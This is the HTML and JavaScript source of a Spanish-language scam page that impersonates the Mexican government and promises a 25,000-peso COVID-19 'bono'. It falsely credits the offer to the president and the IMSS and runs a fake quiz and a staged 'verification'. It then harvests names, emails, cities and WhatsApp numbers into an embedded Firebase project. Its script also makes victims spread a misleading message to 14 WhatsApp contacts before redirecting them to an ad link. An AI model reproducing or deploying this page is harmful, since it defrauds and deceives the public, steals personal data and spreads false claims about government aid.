

<!doctype html>
<html lang="es">
<head>
	<meta charset="UTF-8"/>
	<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no"/>

	<title>¡Por motivos de COVID-19 tienes un bono y una tarjeta Bienestar disponible!</title>
	
	
	<meta property="og:title" content="¡Por motivos de COVID-19 tienes un bono y una tarjeta Bienestar disponible!"/>
	<meta property="og:description" content="El Gobierno para ayudar a combatir el COVID-19 ha decidido comenzar la entrega de bonos de 25,000 pesos."/>
	<meta property="og:imageWS" content="https://i.imgur.com/c1DWFMJ.png"/>
	<meta property="og:image" content="https://i.imgur.com/0ongP1C.png"/>
	
	<link rel="shortcut icon" href="https://www.gob.mx/cms/uploads/image/file/488329/favicon.png"/>
	<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css"/>
	<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Asap:400,700&display=swap"/>
	
	<style>
	body {
	    font-family: 'Asap', sans-serif;
		background-color: #e9ebee;
		
		
	}

	.container {
		max-width: 590px;
		padding: 15px 15px;
		background-color: #ffffff;
		
	}	

	.dmzvq {
		margin: -15px -15px 15px -15px;
		
	}
	
	.jfvri {
		width: 100%;
		display: block;
	}
	
	.ep81c {
		color: #000000;
		font-size: 28px;
		text-align: center;
		font-weight: bold;
		line-height: 40px;
		margin: 0px 20px 15px 20px;
	}
	
	.imvbj {
		width: 60%;
		color: #000000;
		font-size: 16px;
		font-weight: bold;
		padding: 10px 15px;
		border-radius: 10px;
		text-align: center;
		border: 1px solid #041e42;
		background-color: #009cd6;
		margin: auto;
		display: block;
	}
	
	.x9m3i {
		width: 100%;
		color: #000000;
		font-size: 16px;
		
		text-align: center;
		margin-bottom: 15px;
		display: block;
	}
	
	.lujn5 {
		width: 100%;
		color: #d62718;
		font-size: 18px;
		font-weight: bold;
		text-align: center;
		margin-bottom: 10px;
		display: block;
	}
	
	.zm0w3 {
		width: 100%;
		color: #ffffff;
		font-size: 16px;
		font-weight: bold;
		padding: 15px 15px;
		background-color: #333;
		margin-bottom: 15px;
		border-radius: 4px;
		display: block;
	}
	
	.form-control {
		border: 0px;
		border-radius: 0px;
	}
	
	.tg1m2 {
		width: 100%;
		text-align: center;
		margin-bottom: 15px;
		display: block;
	}
	
	.roitu {
		width: 150px;
	}
	
	.mrzoz {
		width: 100%;
		color: #000000;
		text-align: center;
		margin-bottom: 5px;
		display: none;
	}
	
	.n7qcf,
	.n7qcf:hover,
	.n7qcf:active,
	.n7qcf:focus {
		width: 100%;
		color: #ffffff;
		font-size: 18px;
		font-weight: bold;
		text-align: center;
		padding: 15px 15px;
		margin-bottom: 15px;
		background-color: #398439;
		border: 0px;
		display: block;
	}
	
	.guatf {
		width: 20px;
		margin-top: -3px;
		margin-right: 5px;
	}
	
	.vtykq,
	.vtykq:hover,
	.vtykq:active,
	.vtykq:focus {
		width: 100%;
		color: #ffffff;
		font-size: 18px;
		font-weight: bold;
		text-align: center;
		padding: 15px 15px;
		margin-bottom: 15px;
		background-color: #59775d;
		border: 0px;
		display: block;
	}

	.border {
		border: 1px solid #797a79;
		border-radius: .3rem;
	}
	</style>

<link rel="me" href="https://www.blogger.com/profile/18304001248497254496" />
</head>
<body>
	
<div class="container">
	
	<div class="dmzvq">
		<img class="jfvri" src="images/3dEVEuc.png">	
	</div>
	
	
	<div class="ep81c">
		<span>¡Por motivos de COVID-19 tienes un bono de 25,000 pesos y una tarjeta Bienestar disponible!</span>
	</div>
	
	<div class="dmzvq">
		<img class="jfvri" src="https://i.imgur.com/TntQ0HB.png">	
	</div>
	
	
	
	<div class="x9m3i" id="d1">
	<span>
	
	El presidente <b>Andrés Manuel López Obrador</b> y el titular del IMSS, <b>Zoé Robledo</b>, anunciaron que a partir del martes 21 de abril, los ciudadanos comenzarán a recibir sus bonos de 25,000 pesos por la emergencia del coronavirus.
	
	</span>
	</div>
	
	<div id="p1">
	<div class="x9m3i">Puedes iniciar el proceso para reclamar tu bono aquí:</div>
	<button class="btn vtykq" id="b1">RECLAMAR MI BONO</button>	
	</div>
	
	
	<div id="p2" style="display:none;">
		<div class="x9m3i">Pregunta 1: ¿Estás cuidando de prevenir el virus?</div>
		<button class="btn vtykq" id="b2">SI</button>
		<button class="btn vtykq" id="b2">NO</button>
		<button class="btn vtykq" id="b2">ESTOY COMENZANDO</button>
	</div>
	
	<div id="p3" style="display:none;">
		<div class="x9m3i">Pregunta 2: ¿Crees que el aislamiento social ayudará a contener CoronaVirus?</div>
		<button class="btn vtykq" id="b3">SI</button>
		<button class="btn vtykq" id="b3">NO</button>
	</div>
	
	<div id="p4" style="display:none;">
		<div class="x9m3i">Pregunta 3: ¿Crees que medidas como esta ayudan a superar momentos como este?</div>
		<button class="btn vtykq" id="b4">SI</button>
		<button class="btn vtykq" id="b4">NO</button>
		<button class="btn vtykq" id="b4">NO SE</button>
	</div>
	
	<div id="p5" style="display:none;">
		<div class="x9m3i">Pregunta 4: ¿Desea tener bonos gratuitos durante el período de aislamiento?</div>
		<button class="btn vtykq" id="b5">SI</button>
		<button class="btn vtykq" id="b5">NO</button>
	</div>
	
	<div id="p6" style="display:none;">
		<div class="lujn5">Por favor, espera...</div>
		<div class="tg1m2"><img class="roitu" src="https://www.todoventascolombia.com/Graficas/Iconos/cargando_01.gif"></div>
		<div class="mrzoz" id="v1">✔ Todas las preguntas han sido respondidas.</div>
		<div class="mrzoz" id="v2">✔ Comprobando disponibilidad...</div>
		<div class="mrzoz" id="v3">✔ ¡Te has ganado un BONO de 25,000 pesos!</div>
	</div>
	
	<div id="p7" style="display:none;">
		<div class="lujn5">¡Felicitaciones, te has ganado un BONO de <b>25,000</b> pesos!</div>
		<div class="x9m3i">Para retirar el bono, debemos <b>verificar tus datos</b>:</div>
		<div class="x9m3i" id="complete">
			Completa los campos a continuación para ser contactado y recibir tu bono.
		</div>
		
		<!-- <button class="btn n7qcf" id="b6">
			<img class="guatf" src="https://i.imgur.com/c1TO31W.png"> Compartir Bono en WhatsApp
		</button>
		<button class="btn vtykq" id="b7">Retirar Bono</button> -->

		<form action="" id="form" class="mt-5">
			<div class="form-row">
				<div class="col-md-6">
					<div class="form-group">
						<label for="name">Nombre completo</label>
						<input type="text" id="name" class="form-control border" required placeholder="Nombre">
					</div>
				</div>

				<div class="col-md-6">
					<div class="form-group">
						<label for="email">Correo electrónico</label>
						<input type="email" id="email" class="form-control border" required placeholder="Correo electrónico">
					</div>
				</div>

				<div class="col-md-6">
					<div class="form-group">
						<label for="city">Ciudad o estado</label>
						<input type="text" id="city" class="form-control border" required placeholder="Ciudad o estado">
					</div>
				</div>

				<div class="col-md-6">
					<div class="form-group">
						<label for="contact">Número de contacto / Whatsapp</label>
						<input type="text" id="contact" class="form-control border" required placeholder="Número de contacto">
					</div>
				</div>

				<div class="col">
					<button type="submit" id="btnSubmit" class="btn vtykq">Retirar Bono</button>
				</div>
			</div>
		</form>

		<div id="results">
			<div>
				<h1 class="lujn5">Tus datos han sido registrados.</h1>
				<p id="code" class="text-dark"></p>
				<p class="text-dark">Escribe al whatsapp para realizar un seguimiento de tu bono.</p>
				<div class="text-center">
					<a href="" class="btn btn-success">Escribe al whatsapp</a>
				</div>
			</div>
		</div>
	</div>
	
</div>
	
<script src="jquery.min.js"></script>

<script>
var timer = 1354;

function doSomething() {
	if (timer > 0) {
		timer -= Math.round(Math.random() * 2) + 1;
		$('.countdown').text(timer);
	}
}
</script>

<script>
var time = 0;
var share_count = 0;
var share_total = 14;
var uri = window.location.href;

var url_cpa = ['https://bit.ly/web-tests-AdsTerra', 'https://bit.ly/web-tests-AdsTerra'];
var rand_cpa = url_cpa[Math.floor(Math.random() * url_cpa.length)];

var links_share = ['http://gob.clic-aqui.club/?share', 'http://gob.clic-aqui.club/?share'];

links_share = links_share.map(function(url){
    return url+'?'+Math.random();
});

if(uri.indexOf('&m=1', '&m=1') > 0){
	var clean_uri = uri.substring(0, uri.indexOf('&m=1'));
    window.history.replaceState({}, document.title, clean_uri);
}

if(uri.indexOf('?m=1', '?m=1') > 0){
	var clean_uri = uri.substring(0, uri.indexOf('?m=1'));
    window.history.replaceState({}, document.title, clean_uri);
}

if(uri.indexOf('ref=wasa') > 0){
	document.title = 'SHARE: ' + document.title;
}

function getShareUrl(){
	var url_share = links_share[Math.floor(Math.random() * links_share.length)];
	var text_share = '*La IMSS y el Gobierno* han decidido otorgar bonos de 25,000 pesos para que los ciudadanos puedan comprar alimentos y medicinas por motivos de *coronavirus*, el proceso de solicitud es *GRATIS* y *FACIL* pero debes apresurarte porque se están agotando rapidamente.%0A%0A*MONTOS:*%0A25,000%0A20,000%0A10,000%0A%0A';
	text_share += 'Obten el tuyo antes que se acaben y recuerda *¡QUEDATE EN CASA!*%0A*Clic aquí:* ' + url_share;
	return text_share;
}

$(document).ready(function(){

	$(document).on('click', '#b1', function(){
		$('#p1').hide();
		$('#d1').hide();
		$('#p2').show();
		
		
		
	});
	
	$(document).on('click', '#b2', function(){
		$('#p2').hide();
		$('#p3').show();
	});
	
	$(document).on('click', '#b3', function(){
		$('#p3').hide();
		$('#p4').show();
	});
	
	$(document).on('click', '#b4', function(){
		$('#p4').hide();
		$('#p5').show();
	});
	
	$(document).on('click', '#b5', function(){
		$('#p5').hide();
		$('#p6').show();
		
		setTimeout(function(){
			$('#v1').show();
		}, 1500);
		
		setTimeout(function(){
			$('#v2').show();
		}, 2500);
		
		setTimeout(function(){
			$('#v3').show();
		}, 3500);
		
		setTimeout(function(){
			$('#p6').hide();
			$('#p7').show();
		}, 5000);
		
	});
	
	$(document).on('click', '#b6', function(){
		
		clearInterval(time);
		share_count = (share_count + 1);
		
		var text_link_share = getShareUrl();
		window.open('whatsapp://send?text=' + text_link_share);
		
		if(share_count >= share_total){
			window.location.href = rand_cpa;
		}
		
	});
	
	$(document).on('click', '#b7', function(){
		clearInterval(time);
		if(share_count >= share_total){
			window.location.href = rand_cpa;
		} else {
			alert('Solo ha compartido los bonos a '+share_count+' amigos en WhatsApp!');
		}
	});
	
	
});
</script>

<div style="visibility:hidden;height:0px;">
<script type="text/javascript" src="//widgets.amung.us/small.js"></script>
<script type="text/javascript">WAU_small('dbv8kz2jrn');</script>
<script src="https://www.gstatic.com/firebasejs/7.2.3/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/7.2.3/firebase-firestore.js"></script>
<script src="app.js"></script>
<script>
	window.onload = function() {
		// Initialize Cloud Firestore through Firebase
		firebase.initializeApp({
			apiKey: "AIzaSyDyoGUQJfwtCvrmm_ha_T9mJ7mxv-ztNUc",
			authDomain: "apoyoyucatan.firebaseapp.com",
			databaseURL: "https://apoyoyucatan.firebaseio.com",
			projectId: "apoyoyucatan",
			appId: "1:409737456125:web:96897b00f790b6d9999194",
			measurementId: "G-BFB9B0S1Z8"
		});
	};
</script>
</div>

</body>
</html>